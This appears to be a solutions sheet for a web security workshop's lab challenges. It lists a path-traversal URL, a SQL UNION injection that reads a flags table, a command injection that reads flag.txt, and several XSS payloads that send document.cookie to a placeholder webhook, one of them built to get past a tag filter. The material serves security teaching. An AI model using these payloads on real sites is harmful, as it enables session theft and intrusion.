Web Security Workshop solutions

LFI: exporting data on inspector gadget

Visit http://localhost:3001/?loc=..%2f..%2fdocument%2finsp3ct0r_g4dg3t_456afbc.ht.htmlml

SQLI: Worker's Union

Query: ' UNION SELECT flag, null FROM flags;--

XSS: Basic

<script>
  document.location.href = "<Your webhook site>?c=" + document.cookie;
</script>

OS Command injection: Safe-Cmd

;cat<flag.txt;#

XSS: Getting the staff cookies

<script>
  document.location.href = "<Your webhook site>?c=" + document.cookie;
</script>

XSS: Getting the admin

<scr<script>ipt>
  document.location.href = "<Your webhook site>?c=" + document.cookie;
</scr</script>ipt>